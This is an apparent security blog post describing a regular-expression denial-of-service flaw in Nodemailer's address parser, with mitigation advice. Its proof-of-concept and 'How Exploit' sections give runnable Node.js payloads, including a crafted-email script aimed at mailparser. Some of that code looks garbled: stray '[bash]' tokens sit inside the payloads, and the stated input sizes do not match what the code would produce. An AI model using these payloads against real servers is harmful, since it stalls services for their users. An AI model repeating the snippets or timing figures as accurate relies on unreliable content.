Listen to this Post
CVE-2026-100700 is a denial of service vulnerability in Nodemailer, a widely used email-sending library for Node.js. The flaw resides in the `addressparser` component’s free-text fallback mechanism. When the parser’s strict reading cannot identify a valid address, it falls back to a regular expression that extracts an address from unstructured text. That fallback regex, /\s\b[^@\s]+@[^\s]+\b\s/, suffers from quadratic backtracking behavior. Specifically, the `[^@\s]+` subpattern is retried from every possible start offset within the input, and for each offset it rescans forward to the next `@` character or to the end of the run before failing. The regex engine then simply advances one character and repeats the entire scan. This means that for a whitespace-free run of length n, the engine performs on the order of n² character comparisons.
An attacker can exploit this by supplying a crafted email header value that contains a long whitespace-free run with no usable `@` symbol. Three input shapes cause every offset to fail: a run with no `@` at all, a run where the only `@` has nothing after it, and a run where the only `@` has nothing before it. A fourth shape places a valid address after a long run, forcing the parser to walk the entire run before finding the match. Because Node.js is single-threaded, the event loop is blocked for the entire duration of the parsing operation, stalling the whole process. This is reachable without authentication anywhere inbound header values are handed to the parser, with mailparser being the notable case, and also from application input wherever a user-supplied string is used as a message address, since mime-node parses the to, from, and cc fields when composing a message. The vulnerability is significantly cheaper to exploit than the earlier GHSA-prgh-xp8r-p3m5 flaw: just 273 KB of input is enough to block the event loop for approximately 43 seconds, whereas the comment-joined shape required roughly 1.5 MB to achieve only about 10 seconds of blocking.
DailyCVE Form:
Platform: Nodemailer
Version: before 10.0.6
Vulnerability: ReDoS
Severity: High
date: 2026-09-26
Prediction: 2026-10-10
What Undercode Say: Analytics
The following commands demonstrate the quadratic backtracking behavior. The PoC constructs a header value using a repeating pattern that creates a long whitespace-free run, then measures the parse time.
node -e "
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser(' >' + '>[bash][x]'.repeat(40000));
console.log(Date.now() - s, 'ms');
"
Expected output on version 10.0.5:
~43000 ms
The measured parse times for different input shapes on version 10.0.5 are:
node -e "
const ap = require('nodemailer/lib/addressparser');
const cases = [
'[bash]'.repeat(40000),
'[bash]'.repeat(40000) + '@',
'@' + '[bash]'.repeat(40000),
' >' + '>[bash][x]'.repeat(40000),
];
for (const c of cases) {
const s = Date.now();
ap(c);
console.log(c.length, 'bytes', Date.now() - s, 'ms');
}
"
Output on version 10.0.5: 117000 bytes 9000 ms 117001 bytes 8900 ms 117001 bytes 8800 ms 273000 bytes 42900 ms
A timing check with a single large input:
node -e "
const ap = require('nodemailer/lib/addressparser');
const s = Date.now();
ap(' >' + '>[bash][x]'.repeat(40000));
console.log('Parse took', Date.now() - s, 'ms');
console.log('Input size:', (273000/1024).toFixed(1), 'KB');
"
Output on version 10.0.5: Parse took ~43000 ms Input size: 266.6 KB
How Exploit: (Educational Purposes!)
An attacker can trigger the vulnerability by supplying a crafted email header value containing a long whitespace-free run with no usable `@` symbol. The following Node.js script demonstrates how an inbound email with a malicious header would be processed by mailparser, blocking the event loop:
const { simpleParser } = require('mailparser');
const payload = ' >' + '>[bash][x]'.repeat(40000);
const rawEmail = [
'From: [email protected]',
'To: [email protected]',
'Subject: ' + payload,
'',
'Body text',
].join('\r\n');
const start = Date.now();
simpleParser(rawEmail, (err, mail) => {
if (err) throw err;
console.log('Parse completed in', Date.now() - start, 'ms');
console.log('Subject:', mail.subject);
});
When executed against a vulnerable version, the `simpleParser` call blocks the Node.js event loop for approximately 43 seconds, during which the process is completely unresponsive. An attacker can send a single email with a crafted subject line to cause this condition on the receiving server.
For direct library usage, the exploit is even simpler:
const addressparser = require('nodemailer/lib/addressparser');
const maliciousInput = ' >' + '>[bash][x]'.repeat(40000);
console.log('Starting parse...');
const start = Date.now();
addressparser(maliciousInput);
console.log('Parse took', Date.now() - start, 'ms');
Protection: from this CVE
To protect against CVE-2026-100700:
- Upgrade immediately to Nodemailer version 10.0.6 or later, which contains the fix. The patch replaces the quadratic search with a single linear pass that finds the correct offset and applies the pattern there with a sticky regex, ensuring match results remain identical while eliminating the backtracking vulnerability.
- Enforce strict header-size limits on all inbound email processing pipelines. Limiting the maximum length of header values to a reasonable threshold (e.g., 1-2 KB per the RFC 5322 recommendation) significantly reduces the attack surface even if a vulnerable version cannot be immediately upgraded.
- Restrict or rate-limit untrusted mail-header processing until an upgrade can be deployed. This includes imposing parsing-time limits where the application framework supports it.
- Validate user-supplied address strings before passing them to Nodemailer. If using Zod’s `email()` validator or an equivalent strict email validation function, inputs containing parentheses or unusual comment structures will be rejected before reaching the vulnerable parser.
Impact
Algorithmic-complexity denial of service. A single crafted email header containing a whitespace-free run of approximately 273 KB is sufficient to block the Node.js event loop for roughly 43 seconds. Because Node.js is single-threaded, this stall renders the entire process unresponsive, affecting all concurrent requests and operations handled by that process. The vulnerability is reachable without authentication anywhere inbound header values are passed to the addressparser, with mailparser being the most notable attack vector. It is also reachable from application input wherever a user-supplied string is used as a message address, since mime-node parses the to, from, and cc fields during message composition. The CWE classification for this vulnerability is CWE-407 (Inefficient Algorithmic Complexity).
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

